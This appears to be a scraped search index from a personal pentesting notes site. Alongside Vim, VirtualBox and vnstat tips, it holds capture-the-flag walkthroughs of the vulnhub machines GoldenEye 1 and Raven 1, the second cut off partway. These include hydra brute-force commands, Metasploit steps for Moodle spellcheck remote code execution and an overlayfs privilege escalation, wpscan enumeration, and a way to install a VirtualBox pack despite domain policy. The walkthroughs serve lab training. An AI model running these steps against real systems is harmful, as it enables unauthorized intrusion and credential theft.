Keys g+d (gd): jump to the definition of the variable/function under the cursor in the current file. Keys g+f (gf): open the file whose name is under the cursor, even if it's a different file from the one we have open. Our browsing activity piles up in the VIM editor's jump list.

                            To switch between activities:

• CTRL+o : Go back to the previous location in the browsing activity.
• CTRL+i : Go forward.
                            "},{"location":"vim/#search-in-cursor-mode","title":"Search in CURSOR mode","text":"

                            Search from cursor position with:

• /expression : Search forward for expression.
                            • n : Go to the next occurrence.
                            • N : Go to previous occurrence.
                            • ESC : Escape the search.
                            "},{"location":"vim/#browsing-from-opening-and-closing-tags","title":"Browsing from opening and closing tags","text":"

Move the cursor from a closing parenthesis to the matching opening one (and vice versa):

• % : Jump between matching opening and closing pairs: () [] {}
                            "},{"location":"vim/#substitute-in-cursor-mode","title":"Substitute in CURSOR mode","text":"

                            To change \"expresion1\" to \"expresion2\" for the first occurrence:

                            # Press ESC key to enter CURSOR mode.\n:s/expression1/expression2\n

To change all occurrences in the current line:

                            # Press ESC key to enter CURSOR mode.\n:s/expression1/expression2/g\n

                            To change all occurrences in the document (not asking one by one):

# Press ESC key to enter CURSOR mode.\n:%s/expression1/expression2/g\n

                            To change all occurrences in the document asking one by one:

# Press ESC key to enter CURSOR mode.\n:%s/expression1/expression2/gc\n
                            "},{"location":"virtualbox/","title":"VirtualBox and Extension Pack","text":"

                            How to install the Extension Pack manually, bypassing possible policies existing in a Windows DC.

1. Download the .vbox-extpack file. It is actually just a .tar.gz archive, so its contents can be unpacked.
2. Place these contents in the ExtensionPacks subdirectory of the VirtualBox installation directory, typically C:\Program Files\Oracle\VirtualBox
3. That's it. Run VirtualBox and click on Install extension in the corresponding section. The installation will now succeed.
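As a rough sketch of steps 1 and 2 (the pack file name below is an example; use whatever version you downloaded):

# The .vbox-extpack file is just a gzipped tarball\nmkdir extpack-contents\ntar -xzf Oracle_VM_VirtualBox_Extension_Pack-7.0.8.vbox-extpack -C extpack-contents\n# Copy the extracted contents into <VirtualBox install dir>\ExtensionPacks\n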
                            ","tags":["windows","bypass techniques"]},{"location":"virtualbox/#how-to-enlarge-a-virtual-machines-disk-in-virtualbox","title":"How to Enlarge a Virtual Machine\u2019s Disk in VirtualBox","text":"

                            In VirtualBox, go to File > Virtual Media Manager and use the slider to adjust the disk size. In VMWare, right-click your virtual machine (VM), then go to Settings > Hard Disk > Expand, and expand the disk. Finally, boot your VM and expand the partition using GParted on Linux or Disk Management on Windows.
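If you prefer the command line, VirtualBox also ships the VBoxManage utility. A minimal sketch (the disk path is an example; --resize takes the new size in MB):

VBoxManage modifymedium disk \"~/VirtualBox VMs/kali/kali.vdi\" --resize 20480\n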

                            ","tags":["windows","bypass techniques"]},{"location":"vnstat/","title":"vnstat - Monitoring network impact","text":"","tags":["network","bash","tools"]},{"location":"vnstat/#installation","title":"Installation","text":"
                            sudo apt install vnstat    \n
                            ","tags":["network","bash","tools"]},{"location":"vnstat/#basic-usage","title":"Basic usage","text":"

                            Monitor the eth0 network adapter before running a Nessus scan:

                            sudo vnstat -l -i eth0\n
                            ","tags":["network","bash","tools"]},{"location":"vpn/","title":"VPN notes","text":"

                            There are two main types of remote access VPNs: client-based VPN and SSL VPN. SSL VPN uses the web browser as the VPN client.

Usage of a VPN service does not guarantee anonymity or privacy but is useful for bypassing certain network/firewall restrictions or when connected to a possibly hostile network.

When connected to any penetration testing/hacking-focused lab, we should always consider the network to be \"hostile.\" We should only connect from a virtual machine, disallow password authentication if SSH is enabled on our attacking VM, lock down any web servers, and not leave sensitive information on our attack VM.

DO NOT use the same VM that we use to perform client assessments to play CTFs on any platform.

                            # Show us the networks accessible via the VPN.\n netstat -rn\n
                            ","tags":["vpn"]},{"location":"vulnerability-assessment/","title":"Vulnerability assessment","text":"

Tools: Nessus, OpenVAS

                            ","tags":["pentesting","assessment","openvas","nessus"]},{"location":"vulnhub-goldeneye-1/","title":"Walkthrough - GoldenEye 1, a vulnhub machine","text":"","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#about-the-machine","title":"About the machine","text":"data Machine GoldenEye 1 Platform Vulnhub url link Download https://drive.google.com/open?id=1M7mMdSMHHpiFKW3JLqq8boNrI95Nv4tq Download Mirror https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova Size 805 MB Author creosote Release date 4 May 2018 Description OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt. Difficulty Easy","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#walkthrough","title":"Walkthrough","text":"","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#setting-up-the-machines","title":"Setting up the machines","text":"

                            I'll be using Virtual Box.

                            Kali machine (from now on: attacker machine) will have two network interfaces:

                            • eth0 interface: NAT mode (for internet connection).
                            • eth1 interface: Host-only mode (for attacking the victim machine).

                            GoldenEye 1 machine (from now on: victim machine) will have only one network interface:

                            • eth0 interface.
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#reconnaissance","title":"Reconnaissance","text":"","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#first-we-need-to-identify-our-ip-and-afterwards-our-ips-victim-address","title":"First, we need to identify our IP, and afterwards our IP's victim address.","text":"

                            For that we'll be using netdiscover.

                            ip a\n

                            eth1 interface of the attacker machine will be: 192.168.56.105.

                            sudo netdiscover -i eth1 -r 192.168.56.105/24\n

                            Results:

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180\n _____________________________________________________________________________\n   IP            At MAC Address     Count     Len  MAC Vendor / Hostname\n -----------------------------------------------------------------------------\n 192.168.56.1    0a:00:27:00:00:00      1      60  Unknown vendor\n 192.168.56.100  08:00:27:66:9a:ab      1      60  PCS Systemtechnik GmbH\n 192.168.56.101  08:00:27:dd:34:ac      1      60  PCS Systemtechnik GmbH\n

So, the victim's IP address is: 192.168.56.101.

Secondly, let's run a port scan to see the services:

nmap -p- -A 192.168.56.101\n

                            And results:

                            Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-17 13:31 EST\nNmap scan report for 192.168.56.101\nHost is up (0.00013s latency).\nNot shown: 65531 closed tcp ports (conn-refused)\nPORT      STATE SERVICE  VERSION\n25/tcp    open  smtp     Postfix smtpd\n|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN\n| ssl-cert: Subject: commonName=ubuntu\n| Not valid before: 2018-04-24T03:22:34\n|_Not valid after:  2028-04-21T03:22:34\n|_ssl-date: TLS randomness does not represent time\n80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))\n|_http-title: GoldenEye Primary Admin Server\n|_http-server-header: Apache/2.4.7 (Ubuntu)\n55006/tcp open  ssl/pop3 Dovecot pop3d\n|_pop3-capabilities: SASL(PLAIN) RESP-CODES TOP USER UIDL PIPELINING AUTH-RESP-CODE CAPA\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server\n| Not valid before: 2018-04-24T03:23:52\n|_Not valid after:  2028-04-23T03:23:52\n55007/tcp open  pop3     Dovecot pop3d\n|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE STLS SASL(PLAIN) USER CAPA PIPELINING TOP UIDL\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server\n| Not valid before: 2018-04-24T03:23:52\n|_Not valid after:  2028-04-23T03:23:52\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 40.89 seconds\n

                            As there is an Apache server, let's see what is in there. We'll be opening http://192.168.56.101 in our browser.

On the front page we are given a URL to log in: /sev-home/, and looking at the source code, in the terminal.js file we can read a commented-out section:

                            //\n//Boris, make sure you update your default password. \n//My sources say MI6 maybe planning to infiltrate. \n//Be on the lookout for any suspicious network traffic....\n//\n//I encoded you p@ssword below...\n//\n//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;\n//\n//BTW Natalya says she can break your codes\n//\n

Now we have two usernames, boris and natalya, and we also have an apparently encoded password (HTML decimal entities). By using Burp Decoder, we can extract the password: InvincibleHack3r

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#third-now-we-can-browse-to-http19216856101sev-home","title":"Third, now we can browse to http://192.168.56.101/sev-home","text":"

A Basic Authentication pop-up will be displayed. To log into the system, enter:

                            • user: boris
                            • password: InvincibleHack3r
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fourth-in-the-landing-page-we-can-read-this-valuable-information","title":"Fourth, in the landing page we can read this valuable information:","text":"

                            \"Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port\".

                            Also by looking at the source code we can read this commented line:

                            <!-- Qualified GoldenEye Network Operator Supervisors: Natalya Boris -->\n

Hmmm, interesting.

As we know there are some high open ports (such as 55006 and 55007) running the Dovecot pop3 service, we can try to access it with the telnet protocol on port 55007. We could also have used netcat.

                            telnet 192.168.56.101 55007\n

                            Results:

                            Trying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nUSER boris\n+OK\nPASSWORD InvincibleHack3r\n-ERR Unknown command.\nPASS InvincibleHack3r\n-ERR [AUTH] Authentication failed.\nUSER natalya\n+OK\nPASS InvincibleHack3r\n-ERR [AUTH] Authentication failed.\n
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fifth-lets-try-to-brute-force-the-service-by-using-hydra","title":"Fifth, let's try to brute-force the service by using hydra.","text":"
                            hydra -l boris -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3\n

                            And the results:

                            Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-17 13:57:42\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task\n[DATA] attacking pop3://192.168.56.101:55007/\n[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active\n[STATUS] 72.00 tries/min, 144 tries in 00:02h, 78 to do in 00:02h, 16 active\n[55007][pop3] host: 192.168.56.101   login: boris   password: secret1!\n1 of 1 target successfully completed, 1 valid password found\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-17 14:00:19\n

                            We do the same for the user natalya.

                            hydra -l natalya -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3\n

                            And the results:

                            Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-19 13:45:18\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task\n[DATA] attacking pop3://192.168.56.101:55007/\n[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active\n[55007][pop3] host: 192.168.56.101   login: natalya   password: bird\n[STATUS] 111.00 tries/min, 222 tries in 00:02h, 1 to do in 00:01h, 15 active\n1 of 1 target successfully completed, 1 valid password found\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-19 13:47:19\n

So now, we have these credentials for the dovecot pop3 service:

• user: boris
• password: secret1!

• user: natalya
• password: bird
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#sixth-lets-access-dovecot-pop3-service","title":"Sixth, let's access dovecot pop3 service","text":"

                            We can use telnet as before:

                            telnet 192.168.56.101 55007\n

                            Results:

                            Trying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nUSER boris\n+OK\nPASS secret1!\n+OK Logged in.\n

Let's see all the messages in our inbox:

                            # List messages in inbox\nLIST\n

                            Results:

                            +OK 3 messages:\n1 544\n2 373\n3 921\n.\n

                            Now let's RETRIEVE all messages from inbox:

# For retrieving the first message:\nRETR 1\n\n# For retrieving the second message:\nRETR 2\n\n# For retrieving the third message:\nRETR 3\n\n# There were only three messages; RETR 5 below returns an error\n

                            And messages are:

                            RETR 1\n+OK 544 octets\nReturn-Path: <root@127.0.0.1.goldeneye>\nX-Original-To: boris\nDelivered-To: boris@ubuntu\nReceived: from ok (localhost [127.0.0.1])\n        by ubuntu (Postfix) with SMTP id D9E47454B1\n        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)\nMessage-Id: <20180425022326.D9E47454B1@ubuntu>\nDate: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)\nFrom: root@127.0.0.1.goldeneye\n\nBoris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.\n.\nRETR 2\n+OK 373 octets\nReturn-Path: <natalya@ubuntu>\nX-Original-To: boris\nDelivered-To: boris@ubuntu\nReceived: from ok (localhost [127.0.0.1])\n        by ubuntu (Postfix) with ESMTP id C3F2B454B1\n        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)\nMessage-Id: <20180425024249.C3F2B454B1@ubuntu>\nDate: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)\nFrom: natalya@ubuntu\n\nBoris, I can break your codes!\n.\nRETR 3\n+OK 921 octets\nReturn-Path: <alec@janus.boss>\nX-Original-To: boris\nDelivered-To: boris@ubuntu\nReceived: from janus (localhost [127.0.0.1])\n        by ubuntu (Postfix) with ESMTP id 4B9F4454B1\n        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)\nMessage-Id: <20180425025235.4B9F4454B1@ubuntu>\nDate: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)\nFrom: alec@janus.boss\n\nBoris,\n\nYour cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!\n\nOnce Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....\n\nPS - Keep security tight or we will be compromised.\n\n.\nRETR 5\n-ERR There's no message 5.\n

                            Now, let's do the same for natalya:

                            \u2514\u2500$ telnet 192.168.56.101 55007\nTrying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nuser natalya\n+OK\npass bird\n+OK Logged in.\nlist\n+OK 2 messages:\n1 631\n2 1048\n.\nretr 1\n+OK 631 octets\nReturn-Path: <root@ubuntu>\nX-Original-To: natalya\nDelivered-To: natalya@ubuntu\nReceived: from ok (localhost [127.0.0.1])\n        by ubuntu (Postfix) with ESMTP id D5EDA454B1\n        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)\nMessage-Id: <20180425024542.D5EDA454B1@ubuntu>\nDate: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)\nFrom: root@ubuntu\n\nNatalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.\n\nAlso, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.\n.\nretr 2\n+OK 1048 octets\nReturn-Path: <root@ubuntu>\nX-Original-To: natalya\nDelivered-To: natalya@ubuntu\nReceived: from root (localhost [127.0.0.1])\n        by ubuntu (Postfix) with SMTP id 17C96454B1\n        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)\nMessage-Id: <20180425031956.17C96454B1@ubuntu>\nDate: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)\nFrom: root@ubuntu\n\nOk Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of \"security\"...it'll get the change order escalated without much hassle :)\n\nOk, user creds are:\n\nusername: xenia\npassword: RCP90rulez!\n\nBoris verified her as a valid contractor so just create the account ok?\n\nAnd if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir\n**Make sure to edit your host file since you usually work remote off-network....\n\nSince you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.\n.\n
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#exploitation","title":"Exploitation","text":"

Somehow, without really being aware of it, we have already entered the exploitation phase. In this phase, our findings will take us further until we eventually gain access to the system.

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#first-use-credentials-to-access-the-webservice","title":"First, use credentials to access the webservice","text":"

                            From our reconnaissance / exploitation of the dovecot pop3 service we have managed to gather these new credentials:

                            • username: xenia
                            • password: RCP90rulez!

                            And we also have the instruction to add this line to our /etc/hosts file:

# Open the /etc/hosts file and add this line at the end\n# (the /gnocertdir part belongs in the URL, not in the hosts entry)\n192.168.56.101  severnaya-station.com\n

Now, in our browser we can go to http://severnaya-station.com/gnocertdir and confirm that we have a Moodle CMS. We can log in using the credentials for the user xenia.

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#second-gather-information-and-try-to-exploit-it","title":"Second, gather information and try to exploit it","text":"

Browsing around, we can retrieve the names of two other users:

With these two new users in mind, we can use hydra again to try to brute-force them. Run in two separate tabs:

                            hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3\nhydra -l admin -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3 \n

                            And we obtain results only for the username doak:

                            Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-19 12:07:05\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task\n[DATA] attacking pop3://192.168.56.101:55007/\n[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active\n[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active\n[55007][pop3] host: 192.168.56.101   login: doak   password: goat\n1 of 1 target successfully completed, 1 valid password found\n
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#third-login-into-dovecot-using-the-credentials-found","title":"Third, login into dovecot using the credentials found","text":"
                            • user: doak
                            • password: goat

                            And now, let's read the messages:

                            Trying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nuser doak\n+OK\npass goat\n+OK Logged in.\nlist\n+OK 1 messages:\n1 606\n.\nretr 1\n+OK 606 octets\nReturn-Path: <doak@ubuntu>\nX-Original-To: doak\nDelivered-To: doak@ubuntu\nReceived: from doak (localhost [127.0.0.1])\n        by ubuntu (Postfix) with SMTP id 97DC24549D\n        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)\nMessage-Id: <20180425034731.97DC24549D@ubuntu>\nDate: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)\nFrom: doak@ubuntu\n\nJames,\nIf you're reading this, congrats you've gotten this far. You know how tradecraft works right?\n\nBecause I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......\n\nusername: dr_doak\npassword: 4England!\n\n.\n
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fourth-log-into-moodle-with-new-credentials-and-browse-the-service","title":"Fourth, Log into moodle with new credentials and browse the service","text":"

As we have once again disclosed a new credential for the moodle site, let's log in and see what we can find:

                            • username: dr_doak
                            • password: 4England!

After browsing around as user dr_doak, we can download a file with some more information:

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fifth-analyse-the-image","title":"Fifth, analyse the image","text":"

                            An image in a secret location is shared with us. Let's download it from http://severnaya-station.com/dir007key/for-007.jpg

Apparently this image has nothing juicy, but if we look at its metadata with exiftool, then... magic happens:

                            exiftool for-007.jpg \n

                            Results:

                            ExifTool Version Number         : 12.49\nFile Name                       : for-007.jpg\nDirectory                       : Downloads\nFile Size                       : 15 kB\nFile Modification Date/Time     : 2023:01:19 12:37:35-05:00\nFile Access Date/Time           : 2023:01:19 12:37:35-05:00\nFile Inode Change Date/Time     : 2023:01:19 12:37:35-05:00\nFile Permissions                : -rw-r--r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image/jpeg\nJFIF Version                    : 1.01\nX Resolution                    : 300\nY Resolution                    : 300\nExif Byte Order                 : Big-endian (Motorola, MM)\nImage Description               : eFdpbnRlcjE5OTV4IQ==\nMake                            : GoldenEye\nResolution Unit                 : inches\nSoftware                        : linux\nArtist                          : For James\nY Cb Cr Positioning             : Centered\nExif Version                    : 0231\nComponents Configuration        : Y, Cb, Cr, -\nUser Comment                    : For 007\nFlashpix Version                : 0100\nImage Width                     : 313\nImage Height                    : 212\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)\nImage Size                      : 313x212\nMegapixels                      : 0.066\n

One field catches our attention: \"Image Description\". The value of that field is not very... descriptive: eFdpbnRlcjE5OTV4IQ==.

The two equals signs at the end suggest that base64 encoding has been employed. Let's use Burp Suite's Decoder to decode it.
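Alternatively, we can decode it straight from the command line; the decoded value is the admin password used in the next step:

echo 'eFdpbnRlcjE5OTV4IQ==' | base64 -d\n# xWinter1995x!\n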

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#sixth-now-we-can-login-into-the-moodle-with-admin-credentials","title":"Sixth, now we can login into the moodle with admin credentials","text":"
                            • user: admin
                            • password: xWinter1995x!

As we are admin, we can browse in the sidebar to: Settings > Site administration > Server > Environment. There we can grab the banner with the version of the running moodle: 2.2.3.

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#seventh-google-for-some-exploits-for-moodle-223","title":"Seventh, google for some exploits for moodle 2.2.3","text":"

                            You can get to these results:

                            • https://www.rapid7.com/db/modules/exploit/multi/http/moodle_cmd_exec/.
                            • https://www.exploit-db.com/exploits/29324

Here is an explanation of the vulnerability: Moodle 2.2.3 has a plugin for spell checking. When creating a blog entry (for instance), the user can click a button to check the spelling. In the backend, this triggers a call to an external service. The vulnerability is that an admin user can modify the path to that service to include a one-line reverse shell, which is executed when the Check spelling button is clicked. For this to work, open a netcat listener on your machine. Also, you might need to change the configuration in the plugin settings.

                            I'm not a big fan of metasploit, but in this case I've used it.

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#eight-metasploit-geting-a-shell","title":"Eight: Metasploit, geting a shell","text":"

                            Module multi/http/moodle_spelling_binary_rce

I've employed the module multi/http/moodle_spelling_binary_rce (see the msfconsole sketch after the references below). Basically, Moodle allows an authenticated user to define spellcheck settings via the web interface. The user can update the spellcheck mechanism to point to a system-installed aspell binary. By updating the path for the spellchecker to an arbitrary command, an attacker can run arbitrary commands in the context of the web application upon spellchecking requests. This module also allows an attacker to leverage another privilege escalation vuln. Using the referenced XSS vuln, an unprivileged authenticated user can steal an admin sesskey and use this to escalate privileges to that of an admin, allowing the module to pop a shell as a previously unprivileged authenticated user. This module was tested against Moodle versions 2.5.2 and 2.2.3.

                            • https://nvd.nist.gov/vuln/detail/CVE-2013-3630
                            • https://nvd.nist.gov/vuln/detail/CVE-2013-4341
                            • https://www.exploit-db.com/exploits/28174
                            • https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats
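A minimal msfconsole sequence might look like the following. Treat it as a sketch: the option names (RHOST/RHOSTS, TARGETURI, USERNAME, PASSWORD) can differ between Metasploit versions, and the host and credentials are simply the ones gathered above:

msfconsole\nuse exploit/multi/http/moodle_spelling_binary_rce\nset RHOST severnaya-station.com\nset TARGETURI /gnocertdir\nset USERNAME admin\nset PASSWORD xWinter1995x!\nset LHOST 192.168.56.105\nexploit\n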

                            Now, we move our session to background with CTRL-z.

                            Module post/multi/manage/shell_to_meterpreter

Our goal now is to move from a cmd/unix shell to a more powerful meterpreter session. This will allow us later on to execute a metasploit module to escalate privileges.

                            search shell_to_meterpreter\n

                            We'll be using the module \"post/multi/manage/shell_to_meterpreter\".

We only need to set SESSION and LHOST.
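For instance (a sketch, assuming our cmd/unix shell is session 1 and using our eth1 address from the setup):

use post/multi/manage/shell_to_meterpreter\nset SESSION 1\nset LHOST 192.168.56.105\nrun\n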

                            If everything is ok, now we'll have two sessions.

                            We've done this to be able to escalate privileges, since the session with shell cmd/unix didn't allow us to escalate privileges using exploit/linux/local/overlayfs_priv_esc.

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#escalating-privileges","title":"Escalating privileges","text":"

                            Module exploit/linux/local/overlayfs_priv_esc

We'll be using this module to escalate privileges. How did we get here? We ran:

                            uname -a\n

                            Results:

                            Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux\n

                            Now, after googling \"exploit escalate privileges ubuntu 3.13.0\", we get:

                            • https://www.exploit-db.com/exploits/37292.
                            • https://www.rapid7.com/db/modules/exploit/linux/local/overlayfs_priv_esc/.

Either of these ways to exploit GoldenEye 1 is ok. If you go for the first option and upload the exploit to the machine, you will soon realize that the victim machine does not have the gcc compiler installed, so you will need to use the cc compiler (and modify the exploit code). As for the second option, which I chose, metasploit is not going to work with the cmd/unix session. The error message is similar: gcc is not installed and the code cannot be compiled. You will need to use the meterpreter session for this attack to succeed.

The module exploit/linux/local/overlayfs_priv_esc attempts to exploit two different CVEs related to overlayfs:

• CVE-2015-1328 (Ubuntu specific): 3.13.0-24 (14.04 default) < 3.13.0-55; 3.16.0-25 (14.10 default) < 3.16.0-41; 3.19.0-18 (15.04 default) < 3.19.0-21.
• CVE-2015-8660: Ubuntu: 3.19.0-18 < 3.19.0-43; 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10). Fedora: < 4.2.8 (vulnerable, un-tested). Red Hat: < 3.10.0-327 (RHEL 6, vulnerable, un-tested).

                            To exploit it, we need to use session 2.
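Again as a sketch, pointing the module at the meterpreter session:

use exploit/linux/local/overlayfs_priv_esc\nset SESSION 2\nset LHOST 192.168.56.105\nrun\n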

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#last-getting-the-flag","title":"Last, getting the flag","text":"

                            Now, we can cat the flag:

                            cat .flag.txt\nAlec told me to place the codes here: \n\n568628e0d993b1973adc718237da6e93\n\nIf you captured this make sure to go here.....\n/006-final/xvf7-flag/\n

Isn't it just fun?

                            ","tags":["walkthrough"]},{"location":"vulnhub-raven-1/","title":"Walkthrough: Raven 1, a vulnhub machine","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#about-the-machine","title":"About the machine","text":"data Machine Raven 1 Platform Vulnhub url link Download https://drive.google.com/open?id=1pCFv-OXmknLVluUu_8ZCDr1XYWPDfLxW Download Mirror https://download.vulnhub.com/raven/Raven.ova Size 1.4 GB Author William McCann Release date 14 August 2018 Description Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networking. Difficulty Beginner/Intermediate OS Linux","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#walkthrough","title":"Walkthrough","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#setting-up-the-machines","title":"Setting up the machines","text":"

                            I'll be using Virtual Box.

                            Kali machine (from now on: attacker machine) will have two network interfaces:

                            • eth0 interface: NAT mode (for internet connection).
                            • eth1 interface: Host-only mode (for attacking the victim machine).

                            Raven 1 machine (from now on: victim machine) will have only one network interface:

                            • eth0 interface.

                            After running

                            ip a\n
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#reconnaissance","title":"Reconnaissance","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#identify-victims-ip","title":"Identify victim's IP","text":"

                            we know that the attacker's machine IP address is 192.168.56.102/24. To discover the victim's machine IP, we run:

                            sudo netdiscover -i eth1 -r 192.168.56.102/24\n

                            These are the results:

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#scan-victims-surface-attack","title":"Scan victim's surface attack","text":"

                            Now we can run a scanner to see which services are running on the victim's machine:

                            sudo nmap -p- -A 192.168.56.104\n

                            And the results:

Having a web server on port 80, it's inevitable to open a browser and have a look at it. At the same time, we can run a simple enumeration scan:

                            dirb http://192.168.56.104\n

                            The results are pretty straightforward:

There is a wordpress installation (maybe not a very polished one) running on the server. There are also some services installed, such as PHPMailer.

                            By reviewing the source code in the pages we find the first flag:

                            Here, flag1 in plain text:

                            <!-- End footer Area -->        \n            <!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->\n
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#deeper-scan-with-specific-tool-for-wordpress-service-wpsca","title":"Deeper scan with specific tool for wordpress service: wpsca","text":"

First, let's start by running a much deeper scan with wpscan. We'll be enumerating users:

                            wpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\n

                            And the results show us some interesting findings:

First, one thing that may be useful later: XML-RPC seems to be enabled: http://192.168.56.104/wordpress/xmlrpc.php. What does this service do? It allows authenticated posting of entries. It's also used by wordpress to receive pings when a post is linked back. This means that it's also an open door for exploitation. We'll return to this later.

